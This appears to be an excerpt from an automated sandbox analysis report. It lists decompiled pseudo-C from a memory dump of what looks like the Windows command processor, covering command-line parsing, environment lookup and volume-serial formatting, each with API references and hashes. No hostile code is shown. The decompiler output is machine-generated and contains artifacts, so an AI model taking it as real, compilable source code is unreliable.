                                                      					if(E4A73453E( *(_t88 + 8) +  *(_t88 + 8), 1,  *(_t88 + 0x10),  *(_t88 + 8) +  *(_t88 + 8),  &_v8) == 0) {
                                                      						L28:
                                                      						if(E4A733B03(_t59, _t72, 1) == 0) {
                                                      							_t61 = E4A736BEA(_t60, 1);
                                                      							if(_t61 == 0) {
                                                      								_push(_t61);
                                                      								_push(0x70);
                                                      								goto L32;
                                                      							}
                                                      						} else {
                                                      							_push(0);
                                                      							_push(0x1d);
                                                      							L32:
                                                      							E4A736D44(_t72);
                                                      							_pop(_t72);
                                                      						}
                                                      						_t37 = E4A74FCA6(_t68, _t72, _t78, _t84, _t88);
                                                      					} else {
                                                      						_t67 =  *(_t88 + 8);
                                                      						_t59 =  *(_t88 + 8) + _t67;
                                                      						if(_v8 !=  *(_t88 + 8) + _t67) {
                                                      							goto L28;
                                                      						}
                                                      					}
                                                      				}
                                                      				L3:
                                                      				_t38 = E4A734490(_t37, 1);
                                                      				_t39 = 0x4a7545a8;
                                                      				_t7 = _t39 + 2; // 0x4a7545aa
                                                      				_t85 = _t7;
                                                      				if(_t38 != 0) {
                                                      					do {
                                                      						_t79 =  *_t39;
                                                      						_t39 = _t39 + 2;
                                                      					} while (_t79 != 0);
                                                      					__imp___get_osfhandle(0);
                                                      					WriteConsoleW(_t39 - _t85 >> 1, 1, 0x4a7545a8, _t39 - _t85 >> 1,  &_v8);
                                                      				} else {
                                                      					do {
                                                      						_t81 =  *_t39;
                                                      						_t39 = _t39 + 2;
                                                      					} while (_t81 != 0);
                                                      					E4A73453E((_t39 - _t85 >> 1) + (_t39 - _t85 >> 1), 1, 0x4a7545a8, (_t39 - _t85 >> 1) + (_t39 - _t85 >> 1),  &_v8);
                                                      				}
                                                      				 *(_t88 + 4) =  *(_t88 + 4) + E4A73A8A9(_t88,  *(_t88 + 0x10)) + 1;
                                                      				E4A73AA4F(_t88);
                                                      				if( *(_t88 + 4) >  *((intOrPtr*)(_t88 + 0x1c))) {
                                                      					 *(_t88 + 4) =  *(_t88 + 4) & 0x00000000;
                                                      				}
                                                      				 *( *(_t88 + 0x10)) = 0;
                                                      				 *(_t88 + 8) =  *(_t88 + 8) & 0;
                                                      				return 0;
                                                      				goto L36;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 4A734490: _get_osfhandle.MSVCRT ref: 4A73449A
                                                        • Part of subcall function 4A734490: GetFileType.KERNEL32(00000000), ref: 4A7344A9
                                                      • _get_osfhandle.MSVCRT ref: 4A747B30
                                                      • WriteConsoleW.KERNEL32 ref: 4A747B38
                                                      • _get_osfhandle.MSVCRT ref: 4A747B79
                                                      • WriteConsoleW.KERNEL32 ref: 4A747B81
                                                        • Part of subcall function 4A73453E: _get_osfhandle.MSVCRT ref: 4A734550
                                                        • Part of subcall function 4A73453E: WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A756640,00002000,00000000,00000000,00000001,?,?,4A73596D,00000001,?,?,?,00000001), ref: 4A73459B
                                                        • Part of subcall function 4A73453E: WriteFile.KERNEL32(?,4A756640,-00000001,4A744FE5,00000000), ref: 4A7345AE
                                                      • _get_osfhandle.MSVCRT ref: 4A747BF7
                                                      • WriteConsoleW.KERNEL32 ref: 4A747BFF
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _get_osfhandle$Write$Console$File$ByteCharMultiTypeWide
                                                      • String ID:
                                                      • API String ID: 2401993446-0
                                                      • Opcode ID: 330dd82984dd2084a7465405fa2e81f52203d77602841f973e03b3eafe4fea4b
                                                      • Instruction ID: 87abe8d27300d02bd73f3b0cac0e1351f487fbbc1cd3651b2c263e0b736f82b7
                                                      • Opcode Fuzzy Hash: 330dd82984dd2084a7465405fa2e81f52203d77602841f973e03b3eafe4fea4b
                                                      • Instruction Fuzzy Hash: 9F5102B2648701BFE7719BA4CD4AFEA3BA9EF40751F120515E906DB082E771EE48C760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsicmp$iswspace
                                                      • String ID: KEYS$LIST$OFF
                                                      • API String ID: 759518647-4129271751
                                                      • Opcode ID: cae4bc12a6e2383aa27edec816475845da164127386cb816da1c763b8b0b0531
                                                      • Instruction ID: 35d7ae03d1c7b39e86dc216671c8ad83d652d30e91add91439af69277f14b926
                                                      • Opcode Fuzzy Hash: cae4bc12a6e2383aa27edec816475845da164127386cb816da1c763b8b0b0531
                                                      • Instruction Fuzzy Hash: 3911B17361C322BDF6361762DD8ADE36FACEB417B0B52403AE100CE481EA505C0CC7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E4A7341DD(intOrPtr _a4, long _a8) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				signed int _v529;
                                                      				char _v530;
                                                      				char _v531;
                                                      				signed int _v536;
                                                      				long _v540;
                                                      				signed int __ebx;
                                                      				signed int __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t73;
                                                      				long _t80;
                                                      				signed int _t81;
                                                      				signed int _t82;
                                                      				signed int _t85;
                                                      				long _t86;
                                                      				long _t88;
                                                      				long _t90;
                                                      				signed int _t98;
                                                      				long _t99;
                                                      				long _t100;
                                                      				long _t102;
                                                      				void* _t103;
                                                      				long _t109;
                                                      				void* _t111;
                                                      				signed int _t112;
                                                      				long _t113;
                                                      				intOrPtr _t114;
                                                      				signed int _t115;
                                                      
                                                      				_t73 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t73 ^ _t115;
                                                      				_v536 = _v536 | 0xffffffff;
                                                      				_t114 = _a4;
                                                      				_v540 = _a8;
                                                      				_v529 = 0;
                                                      				_t102 = 0;
                                                      				while(1) {
                                                      					__ecx =  *((intOrPtr*)(__esi + 0x38));
                                                      					__edi =  *(__ecx + __ebx * 2) & 0x0000ffff;
                                                      					__eflags = __di - 0x22;
                                                      					if(__di == 0x22) {
                                                      						__eflags = _v529;
                                                      						__eax = __eax & 0xffffff00 | _v529 == 0x00000000;
                                                      						__eflags = __al;
                                                      						_v529 = __al;
                                                      						__eax = __eax & 0xffffff00 | __al == 0x00000000;
                                                      					}
                                                      					__eflags = __di;
                                                      					if(__di == 0) {
                                                      						break;
                                                      					}
                                                      					__eflags = _v529;
                                                      					if(_v529 != 0) {
                                                      						L8:
                                                      						__eflags = _v536 - 0xffffffff;
                                                      						if(_v536 != 0xffffffff) {
                                                      							L10:
                                                      							__al = 0;
                                                      							 *((short*)(__ebp + __ebx * 2 - 0x20c)) = __di;
                                                      							__ebx = __ebx + 1;
                                                      							__eflags = __ebx - 0x103;
                                                      							if(__ebx < 0x103) {
                                                      								continue;
                                                      							}
                                                      							break;
                                                      						}
                                                      						__eax = E4A7318EB(":.\", __edi);
                                                      						__eflags = __eax;
                                                      						if(__eax != 0) {
                                                      							__eflags =  *0x4a754081;
                                                      							if( *0x4a754081 == 0) {
                                                      								break;
                                                      							}
                                                      							_v536 = __ebx;
                                                      						}
                                                      						goto L10;
                                                      					}
                                                      					__eflags = __al;
                                                      					if(__al != 0) {
                                                      						goto L8;
                                                      					}
                                                      					__eax = E4A7318EB(L"=,;+/[] \t\"", __edi);
                                                      					__eflags = __eax;
                                                      					if(__eax != 0) {
                                                      						break;
                                                      					}
                                                      					goto L8;
                                                      				}
                                                      				__eflags = __ebx;
                                                      				if(__ebx == 0) {
                                                      					_t60 = __ebx - 1; // -1
                                                      					__eax = _t60;
                                                      					L20:
                                                      					return E4A7313A9(_t80, _t102, _v8 ^ _t115, _t111, _t113, _t114);
                                                      				}
                                                      				__eax = 0;
                                                      				__eflags = _v536 - 0xffffffff;
                                                      				 *((short*)(__ebp + __ebx * 2 - 0x20c)) = __ax;
                                                      				if(_v536 != 0xffffffff) {
                                                      					__eax =  &_v528;
                                                      					__eax = GetFileAttributesW( &_v528);
                                                      					__eflags = __eax - 0xffffffff;
                                                      					if(__eax != 0xffffffff) {
                                                      						if(0 == 0) {
                                                      							goto L13;
                                                      						}
                                                      					}
                                                      					_t102 = _v536;
                                                      					 *((short*)(_t115 + _t102 * 2 - 0x20c)) = 0;
                                                      				}
                                                      				L13:
                                                      				_t112 = E4A7340F2(0x2a,  &_v528, _v540);
                                                      				_v536 = _t112;
                                                      				if(_t112 == 0xffffffff) {
                                                      					_t80 = E4A7340F2(0x2d,  &_v528, _v540);
                                                      					__eflags = _t80 - 0x2d;
                                                      					if(_t80 != 0x2d) {
                                                      						L15:
                                                      						_v529 = 0;
                                                      						_v530 = 0;
                                                      						if(_t112 == 0xffffffff) {
                                                      							_t102 = 0;
                                                      							__eflags = 0;
                                                      							_v531 = 0;
                                                      							do {
                                                      								_t81 =  *(_t114 + 0x38);
                                                      								_t113 =  *(_t81 + _t102 * 2) & 0x0000ffff;
                                                      								__eflags = _t113;
                                                      								if(_t113 == 0) {
                                                      									L34:
                                                      									_v531 = 1;
                                                      									goto L32;
                                                      								}
                                                      								__eflags = _t113 - 0x22;
                                                      								if(_t113 == 0x22) {
                                                      									__eflags = _v529;
                                                      									_t98 = _t81 & 0xffffff00 | _v529 == 0x00000000;
                                                      									__eflags = _t98;
                                                      									_v529 = _t98;
                                                      									_v530 = _t98 == 0;
                                                      								}
                                                      								__eflags = _v529;
                                                      								if(_v529 != 0) {
                                                      									L31:
                                                      									_t102 = _t102 + 1;
                                                      									__eflags = _t102;
                                                      									_v530 = 0;
                                                      								} else {
                                                      									__eflags = _v530;
                                                      									if(_v530 != 0) {
                                                      										goto L31;
                                                      									}
                                                      									_t99 = iswspace(_t113);
                                                      									__eflags = _t99;
                                                      									if(_t99 != 0) {
                                                      										goto L34;
                                                      									}
                                                      									_t100 = E4A7318EB("=,;", _t113);
                                                      									__eflags = _t100;
                                                      									if(_t100 != 0) {
                                                      										goto L34;
                                                      									}
                                                      									__eflags = _t113 -  *0x4a77065c; // 0x2f
                                                      									if(__eflags == 0) {
                                                      										goto L34;
                                                      									}
                                                      									goto L31;
                                                      								}
                                                      								L32:
                                                      								__eflags = _v531;
                                                      							} while (_v531 == 0);
                                                      						}
                                                      						_t82 =  *(_t114 + 0x38);
                                                      						_t111 = _t82 + 2;
                                                      						do {
                                                      							_t103 =  *_t82;
                                                      							_t82 = _t82 + 2;
                                                      						} while (_t103 != 0);
                                                      						_t85 = _t82 - _t111 >> 1;
                                                      						if(_t102 != _t85) {
                                                      							_t113 = _t85 + 1;
                                                      							_t86 =  *(_t114 + 0x3c);
                                                      							__eflags = _t86;
                                                      							if(_t86 == 0) {
                                                      								L47:
                                                      								_t88 = E4A732041(_t113 + _t113);
                                                      								_t102 = _t102 + _t102;
                                                      								_v540 = _t88;
                                                      								E4A73185A(_t88, _t113,  *(_t114 + 0x38) + _t102);
                                                      								_t90 =  *(_t114 + 0x3c);
                                                      								__eflags = _t90;
                                                      								if(_t90 != 0) {
                                                      									E4A7320A9(_t114, _v540, _t113, _t90);
                                                      								}
                                                      								 *(_t114 + 0x3c) = _v540;
                                                      								 *((short*)(_t102 +  *(_t114 + 0x38))) = 0;
                                                      								goto L19;
                                                      							}
                                                      							_t63 = _t86 + 2; // 0x4a754212
                                                      							_t111 = _t63;
                                                      							do {
                                                      								_t109 =  *_t86;
                                                      								_t86 = _t86 + 2;
                                                      								__eflags = _t109;
                                                      							} while (_t109 != 0);
                                                      							__eflags = _t113;
                                                      							goto L47;
                                                      						}
                                                      						L19:
                                                      						_t80 = _v536;
                                                      						goto L20;
                                                      					}
                                                      					goto L20;
                                                      				}
                                                      				if(_t112 == 0x14) {
                                                      					 *((intOrPtr*)(_t114 + 0x40)) = 1;
                                                      				}
                                                      				goto L15;
                                                      			}

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: wcschr
                                                      • String ID: :.\$=,;$=,;+/[] "
                                                      • API String ID: 1497570035-843887632
                                                      • Opcode ID: 18060591d4e3c8b59472209886fd8296d3949a6787d37b458ff77eee75158177
                                                      • Instruction ID: c0591a322a14a2d0e43b337e1378a4c0681c4ed59a65cb2092ab16310100d76b
                                                      • Opcode Fuzzy Hash: 18060591d4e3c8b59472209886fd8296d3949a6787d37b458ff77eee75158177
                                                      • Instruction Fuzzy Hash: 5371397094EB599EDFB08BA4C8887D97FB5AF45310F0382E9C459A7593D7309A8CCB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A731F90(signed short* _a4, signed char* _a8) {
                                                      				signed short _t25;
                                                      				signed int _t28;
                                                      				signed char _t29;
                                                      				signed int _t30;
                                                      				signed int _t32;
                                                      				void* _t34;
                                                      				signed int _t35;
                                                      				signed short* _t38;
                                                      				signed int _t39;
                                                      				signed int _t40;
                                                      				signed int _t41;
                                                      				signed short _t42;
                                                      				signed short _t43;
                                                      				signed int _t44;
                                                      				signed int _t45;
                                                      				signed int _t46;
                                                      				signed char _t48;
                                                      				void* _t49;
                                                      				void* _t50;
                                                      				void* _t51;
                                                      				signed short _t55;
                                                      				signed int _t63;
                                                      				signed short* _t64;
                                                      				signed char* _t66;
                                                      				intOrPtr _t67;
                                                      
                                                      				_t25 = E4A731E26();
                                                      				_t64 = _a4;
                                                      				_t66 = _a8;
                                                      				 *_t64 = _t25;
                                                      				_t67 =  *0x4a770650; // 0x0
                                                      				if(_t67 != 0) {
                                                      					__eflags =  *_t66 & 0x00000040;
                                                      					 *0x4a770650 = 0;
                                                      					if(( *_t66 & 0x00000040) != 0) {
                                                      						L10:
                                                      						return 0;
                                                      					}
                                                      					 *_t64 = E4A731E26();
                                                      				}
                                                      				_t55 =  *_t64 & 0x0000ffff;
                                                      				_t28 = _t55 & 0x0000ffff;
                                                      				_t63 = 2;
                                                      				if(_t28 <= 0x29) {
                                                      					if(__eflags == 0) {
                                                      						L22:
                                                      						_t29 =  *_t66;
                                                      						__eflags = _t29 & 0x00000022;
                                                      						if((_t29 & 0x00000022) != 0) {
                                                      							L6:
                                                      							_t30 =  *_t64 & 0x0000ffff;
                                                      							if(_t30 == 0x5e) {
                                                      								__eflags =  *_t66 & 0x00000022;
                                                      								if(( *_t66 & 0x00000022) != 0) {
                                                      									goto L7;
                                                      								}
                                                      								_t42 = E4A731E26();
                                                      								 *_t64 = _t42;
                                                      								__eflags = _t42 - 0xa;
                                                      								if(_t42 != 0xa) {
                                                      									goto L10;
                                                      								}
                                                      								_t43 = E4A731E26();
                                                      								 *_t64 = _t43;
                                                      								__eflags = _t43;
                                                      								L38:
                                                      								if(__eflags == 0) {
                                                      									L17:
                                                      									return 0x100;
                                                      								}
                                                      								goto L10;
                                                      							}
                                                      							L7:
                                                      							if(_t30 == 0x22) {
                                                      								 *_t66 =  *_t66 ^ _t63;
                                                      							}
                                                      							if(( *_t66 & 0x00000023) == 0) {
                                                      								_t32 = iswspace( *_t64 & 0x0000ffff);
                                                      								__eflags = _t32;
                                                      								if(_t32 != 0) {
                                                      									goto L17;
                                                      								}
                                                      								__eflags =  *_t66 & 0x00000004;
                                                      								_t34 = 0x4a754672;
                                                      								if(( *_t66 & 0x00000004) == 0) {
                                                      									_t34 = 0x4a754670;
                                                      								}
                                                      								_t35 = E4A7318EB(_t34,  *_t64 & 0x0000ffff);
                                                      								__eflags = _t35;
                                                      								if(_t35 == 0) {
                                                      									goto L9;
                                                      								}
                                                      								goto L17;
                                                      							} else {
                                                      								L9:
                                                      								if(iswdigit( *_t64 & 0x0000ffff) != 0) {
                                                      									_t38 =  *0x4a754194; // 0x0
                                                      									__eflags = (_t38 - 0x4a76c642 & 0xfffffffe) - 4;
                                                      									if((_t38 - 0x4a76c642 & 0xfffffffe) < 4) {
                                                      										L35:
                                                      										_t39 =  *_t38 & 0x0000ffff;
                                                      										__eflags = _t39 - 0x3c;
                                                      										if(_t39 == 0x3c) {
                                                      											L37:
                                                      											__eflags =  *_t66 & 0x00000022;
                                                      											goto L38;
                                                      										}
                                                      										__eflags = _t39 - 0x3e;
                                                      										if(_t39 != 0x3e) {
                                                      											goto L10;
                                                      										}
                                                      										goto L37;
                                                      									}
                                                      									_t65 =  *(_t38 - 4) & 0x0000ffff;
                                                      									_t40 = iswspace( *(_t38 - 4) & 0x0000ffff);
                                                      									__eflags = _t40;
                                                      									if(_t40 != 0) {
                                                      										L34:
                                                      										_t38 =  *0x4a754194; // 0x0
                                                      										goto L35;
                                                      									}
                                                      									_t41 = E4A7318EB(L"()|&=,;\"", _t65);
                                                      									__eflags = _t41;
                                                      									if(_t41 == 0) {
                                                      										goto L10;
                                                      									}
                                                      									goto L34;
                                                      								}
                                                      								goto L10;
                                                      							}
                                                      						}
                                                      						__eflags = _t29 & 0x00000010;
                                                      						if((_t29 & 0x00000010) != 0) {
                                                      							L15:
                                                      							 *_t66 =  *_t66 & 0xffffffdd;
                                                      							__eflags =  *_t66;
                                                      							L16:
                                                      							__eflags =  *_t66 & 0x00000022;
                                                      							if(( *_t66 & 0x00000022) != 0) {
                                                      								goto L6;
                                                      							}
                                                      							goto L17;
                                                      						}
                                                      						__eflags = _t55 - 0x29;
                                                      						if(_t55 != 0x29) {
                                                      							goto L15;
                                                      						}
                                                      						goto L6;
                                                      					}
                                                      					_t44 = _t28;
                                                      					__eflags = _t44;
                                                      					if(_t44 == 0) {
                                                      						goto L15;
                                                      					}
                                                      					_t45 = _t44 - 0xa;
                                                      					__eflags = _t45;
                                                      					if(_t45 != 0) {
                                                      						_t46 = _t45 - 0x1c;
                                                      						__eflags = _t46;
                                                      						if(_t46 == 0) {
                                                      							goto L16;
                                                      						}
                                                      						__eflags = _t46 != _t63;
                                                      						if(_t46 != _t63) {
                                                      							goto L6;
                                                      						}
                                                      						L20:
                                                      						_t48 =  *_t66;
                                                      						__eflags = _t48 & 0x00000022;
                                                      						if((_t48 & 0x00000022) != 0) {
                                                      							goto L6;
                                                      						}
                                                      						__eflags = _t48 & 0x00000008;
                                                      						if((_t48 & 0x00000008) == 0) {
                                                      							goto L6;
                                                      						}
                                                      						goto L22;
                                                      					}
                                                      					goto L15;
                                                      				}
                                                      				_t49 = _t28 - 0x3c;
                                                      				if(_t49 == 0) {
                                                      					goto L16;
                                                      				}
                                                      				_t50 = _t49 - _t63;
                                                      				if(_t50 == 0) {
                                                      					goto L16;
                                                      				}
                                                      				_t51 = _t50 - _t63;
                                                      				if(_t51 == 0) {
                                                      					__eflags =  *_t66 & 0x00000022;
                                                      					if(( *_t66 & 0x00000022) != 0) {
                                                      						goto L6;
                                                      					}
                                                      					__eflags =  *0x4a754198; // 0x0
                                                      					if(__eflags != 0) {
                                                      						goto L20;
                                                      					}
                                                      					goto L10;
                                                      				}
                                                      				if(_t51 == 0x3c) {
                                                      					goto L16;
                                                      				}
                                                      				goto L6;
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: iswspace$iswdigit
                                                      • String ID: ()|&=,;"$=,;
                                                      • API String ID: 2398571481-3440842346
                                                      • Opcode ID: b16cabe113b8a61527acc7f35b3e3f0749030ef4a497d79eed648f6e5f17c51c
                                                      • Instruction ID: e0cfa16ad752f824eb21f0e8012f6598c297061a2e4c5bf3fa69ca4b90a84df9
                                                      • Opcode Fuzzy Hash: b16cabe113b8a61527acc7f35b3e3f0749030ef4a497d79eed648f6e5f17c51c
                                                      • Instruction Fuzzy Hash: B141146551FA4395EBB01E69C9547787F94AF252A4F23011AEFC08E493F324858EC3A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E4A742ECA(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				short _v530;
                                                      				short _v532;
                                                      				char _v1052;
                                                      				short _v1576;
                                                      				char _v2088;
                                                      				intOrPtr _v2092;
                                                      				intOrPtr _v2096;
                                                      				long _v2100;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t29;
                                                      				intOrPtr* _t35;
                                                      				void* _t42;
                                                      				intOrPtr _t66;
                                                      				unsigned int _t73;
                                                      				void* _t75;
                                                      				signed int _t78;
                                                      
                                                      				_t29 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t29 ^ _t78;
                                                      				_v2092 = _a4;
                                                      				E4A73185A( &_v1052, 0x104, _a8);
                                                      				_t35 =  &_v1052;
                                                      				_t75 = _t35 + 2;
                                                      				do {
                                                      					_t66 =  *_t35;
                                                      					_t35 = _t35 + 2;
                                                      				} while (_t66 != 0);
                                                      				_t77 = 0x106;
                                                      				if(E4A73A2C1(_t75,  &_v1052, (_t35 - _t75 >> 1) + 1,  &_v532, 0x106) == 0) {
                                                      					L14:
                                                      					_t42 = 0;
                                                      				} else {
                                                      					E4A7320A9(0x106,  &_v532, 0x106, E4A732EC8);
                                                      					if(GetVolumeInformationW( &_v532,  &_v1576, 0x104,  &_v2100, 0, 0, 0, 0) == 0) {
                                                      						_t77 = GetLastError;
                                                      						if(GetLastError() == 0x90) {
                                                      							goto L14;
                                                      						} else {
                                                      							_push(0);
                                                      							_push(GetLastError());
                                                      							E4A736D44( &_v532);
                                                      							_t42 = 1;
                                                      						}
                                                      					} else {
                                                      						if(_v532 == 0x5c) {
                                                      							 *((short*)(E4A732ED1( &_v532))) = 0;
                                                      						} else {
                                                      							_v530 = 0;
                                                      						}
                                                      						if(_v1576 != 0) {
                                                      							_push( &_v1576);
                                                      							_t42 = E4A74301F(_t75, _v2092, 0x235f, 2,  &_v532);
                                                      						} else {
                                                      							_t42 = E4A74301F(_t75, _v2092, 0x235e, 1,  &_v532);
                                                      						}
                                                      						if(_t42 == 0) {
                                                      							_t73 = _v2100;
                                                      							if(_t73 == 0) {
                                                      								if(_v2096 != 0) {
                                                      									goto L10;
                                                      								} else {
                                                      								}
                                                      							} else {
                                                      								L10:
                                                      								_push(_t73 & 0x0000ffff);
                                                      								E4A73179D( &_v2088, 0x100, L"%04X-%04X", _t73 >> 0x10);
                                                      								_t42 = E4A74301F(_t75, _v2092, 0x235b, 1,  &_v2088);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return E4A7313A9(_t42, 0, _v8 ^ _t78, _t75, 0x104, _t77);
                                                      			}























                                                      APIs
                                                      • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000,?,00000106,Function_00002EC8,?,?,?,00000106,?), ref: 4A742F69
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID: %04X-%04X$\
                                                      • API String ID: 2039140958-3612930356
                                                      • Opcode ID: b68fd1a5176a9f42ffcaa7e73060993601a485b41ed83a892828315a693b945d
                                                      • Instruction ID: 8c86e768d5dc6ad5b51f9f6dee3295fb1b95d6f61b6d3012290857e96e09887a
                                                      • Opcode Fuzzy Hash: b68fd1a5176a9f42ffcaa7e73060993601a485b41ed83a892828315a693b945d
                                                      • Instruction Fuzzy Hash: 8C4187B290411DAADF70DA64CC85EEB77BDEB58300F4145A5E649EB041EA719BC8CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E4A74C9D2(void* __ecx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr* _v12;
                                                      				intOrPtr* _t18;
                                                      				short* _t19;
                                                      				intOrPtr* _t20;
                                                      				intOrPtr* _t24;
                                                      				signed int _t26;
                                                      				signed int _t27;
                                                      				signed int _t30;
                                                      				intOrPtr* _t31;
                                                      				signed int _t33;
                                                      				signed int _t40;
                                                      				intOrPtr _t43;
                                                      				intOrPtr _t44;
                                                      				void* _t48;
                                                      				intOrPtr _t49;
                                                      				void* _t50;
                                                      				intOrPtr* _t52;
                                                      				intOrPtr* _t55;
                                                      				signed int _t56;
                                                      				void* _t58;
                                                      
                                                      				_t52 =  *0x4a7541c4; // 0x0
                                                      				if(_t52 != 0) {
                                                      					_t18 = E4A7319D6(E4A732B0D(_a4, 0));
                                                      					_t55 = _t18;
                                                      					_v12 = _t55;
                                                      					if(_t55 != 0) {
                                                      						_t19 = E4A732148(_t55, 0x20);
                                                      						if(_t19 != 0) {
                                                      							 *_t19 = 0;
                                                      						}
                                                      						_t20 = _t55;
                                                      						_t3 = _t20 + 2; // 0x2
                                                      						_t48 = _t3;
                                                      						do {
                                                      							_t43 =  *_t20;
                                                      							_t20 = _t20 + 2;
                                                      						} while (_t43 != 0);
                                                      						_t40 = _t20 - _t48 >> 1;
                                                      						_t24 = _t52;
                                                      						_v8 = 1;
                                                      						_t5 = _t24 + 2; // 0x2
                                                      						_t44 = _t5;
                                                      						do {
                                                      							_t49 =  *_t24;
                                                      							_t24 = _t24 + 2;
                                                      						} while (_t49 != 0);
                                                      						_t26 = _t24 - _t44;
                                                      						_t27 = _t26 >> 1;
                                                      						_t56 = _t27;
                                                      						if(_t26 == 0) {
                                                      							L19:
                                                      							E4A736D44(_t44, 0x400023a9, 1, _a4);
                                                      							L20:
                                                      							E4A73142E(_v12);
                                                      							_t30 = _v8;
                                                      							L21:
                                                      							L22:
                                                      							return _t30;
                                                      						}
                                                      						while( *0x4a7541b4 == 0) {
                                                      							if(_t56 >= _t40) {
                                                      								__imp___wcsnicmp(_t52, _v12, _t40);
                                                      								_t58 = _t58 + 0xc;
                                                      								if(_t27 == 0) {
                                                      									E4A7358F3(L"%s\r\n", _t52);
                                                      									_v8 = _v8 & 0x00000000;
                                                      								}
                                                      							}
                                                      							_t52 = _t52 + 2 + _t56 * 2;
                                                      							_t31 = _t52;
                                                      							_t50 = _t31 + 2;
                                                      							do {
                                                      								_t44 =  *_t31;
                                                      								_t31 = _t31 + 2;
                                                      							} while (_t44 != 0);
                                                      							_t33 = _t31 - _t50;
                                                      							_t27 = _t33 >> 1;
                                                      							_t56 = _t27;
                                                      							if(_t33 != 0) {
                                                      								continue;
                                                      							}
                                                      							break;
                                                      						}
                                                      						if(_v8 == 0) {
                                                      							goto L20;
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					_t30 = _t18 + 1;
                                                      					goto L21;
                                                      				}
                                                      				_push("Null environment");
                                                      				fprintf(__imp___iob + 0x40, "\nCMD Internal Error %s\n");
                                                      				_t30 = 1;
                                                      				goto L22;
                                                      			}

























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: fprintf
                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                      • API String ID: 383729395-2781220306
                                                      • Opcode ID: 8b672709d092e9c7dd45c6f611d31645b9df8130680185a06fbacc0213b6d7fc
                                                      • Instruction ID: f3581ab500710ba31e7718f01a6e0e5630b68577a616b249ea769240676da94f
                                                      • Opcode Fuzzy Hash: 8b672709d092e9c7dd45c6f611d31645b9df8130680185a06fbacc0213b6d7fc
                                                      • Instruction Fuzzy Hash: EB31F672A09302ABDB71DB54DC09B9B3FA9EB55381F064250EA42EB541EBB0DA48C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Delete$CloseOpenValue
                                                      • String ID: %s=%s
                                                      • API String ID: 2185037004-1087296587
                                                      • Opcode ID: ea3d77ad50fc4b8a47adffd0f47cc22560f52e03cbe62838cc82107761f55e84
                                                      • Instruction ID: d488cdcc7d82546e91d505e07d74c54eaa1c079c8ef1fb8ffd9822d3664c3e57
                                                      • Opcode Fuzzy Hash: ea3d77ad50fc4b8a47adffd0f47cc22560f52e03cbe62838cc82107761f55e84
                                                      • Instruction Fuzzy Hash: 93317C75109225FBDF715FA0CC8DA8F3F69EB0A760F128011F9599A152D7718A58CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 34%
                                                      			E4A751BCF(intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				short _v528;
                                                      				short _v1048;
                                                      				long _v1052;
                                                      				void* __esi;
                                                      				signed int _t10;
                                                      				intOrPtr _t12;
                                                      				int _t14;
                                                      				void* _t15;
                                                      				signed int _t22;
                                                      				void* _t24;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      				signed int _t34;
                                                      
                                                      				_t10 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t10 ^ _t34;
                                                      				_t12 = _a4;
